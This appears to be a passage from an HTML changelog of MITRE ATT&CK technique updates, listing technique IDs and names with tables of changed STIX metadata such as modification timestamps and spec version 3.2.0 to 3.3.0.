style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:18:17.938000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.013] Obfuscated Files or Information: Encrypted/Encoded File</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:18:22.179000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1480.001] Execution Guardrails: Environmental Keying</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:07:10.470000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr></tbody></table></details><hr><h4>[T1585] Establish Accounts</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:24.456000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1574.005] Hijack Execution Flow: Executable Installer File Permissions Weakness</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 23:02:03.423000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr></tbody></table></details><hr><h4>[T1480] Execution Guardrails</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:03:40.312000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.685000+00:00</td></tr></tbody></table></details><hr><h4>[T1048.002] Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:05.552000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1041] Exfiltration Over C2 Channel</h4><p><b>Current version</b>: 2.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:06.675000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:39.079000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1567] Exfiltration Over Web Service</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:42.061000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1567.004] Exfiltration Over Web Service: Exfiltration Over Webhook</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:58:26.901000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:19.048000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1567.001] Exfiltration Over Web Service: Exfiltration to Code Repository</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:04.207000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.686000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1190] Exploit Public-Facing Application</h4><p><b>Current version</b>: 2.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:41.788000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr></tbody></table></details><hr><h4>[T1687] Exploitation for Defense Impairment</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:10:42.138000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.619000+00:00</td></tr></tbody></table></details><hr><h4>[T1211] Exploitation for Stealth</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 13:36:04.483000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1587.004] Develop Capabilities: Exploits</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:17.967000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.711000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1564.014] Hide Artifacts: Extended Attributes</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:19:25.896000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr></tbody></table></details><hr><h4>[T1090.002] Proxy: External Proxy</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:54.165000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1133] External Remote Services</h4><p><b>Current version</b>: 2.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:24.982000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1055.011] Process Injection: Extra Window Memory Injection</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:27:04.367000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.617000+00:00</td></tr></tbody></table></details><hr><h4>[T1008] Fallback Channels</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:35.854000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1070.004] Indicator Removal: File Deletion</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:28:46.342000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.718000+00:00</td></tr></tbody></table></details><hr><h4>[T1071.002] Application Layer Protocol: File Transfer Protocols</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:08.302000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1083] File and Directory Discovery</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:00.036000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.644000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1222] File and Directory Permissions Modification</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.078000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.637000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.012] Hide Artifacts: File/Path Exclusions</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 19:21:42.768000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.011] Obfuscated Files or Information: Fileless Storage</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:18:39.119000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.619000+00:00</td></tr></tbody></table></details><hr><h4>[T1657] Financial Theft</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 16:12:12.496000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.685000+00:00</td></tr></tbody></table></details><hr><h4>[T1495] Firmware Corruption</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:37.207000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1056.002] Input Capture: GUI Input Capture</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:10.643000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1553.001] Subvert Trust Controls: Gatekeeper Bypass</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.996000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr></tbody></table></details><hr><h4>[T1589] Gather Victim Identity Information</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:47.303000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1591] Gather Victim Org Information</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:06.846000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1683] Generate Content</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 23:36:34.476000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1484.001] Domain or Tenant Policy Modification: Group Policy Modification</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.883000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T1552.006] Unsecured Credentials: Group Policy Preferences</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:05.282000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.006] Obfuscated Files or Information: HTML Smuggling</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:19:27.839000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.005] Hide Artifacts: Hidden File System</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:22:45.621000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 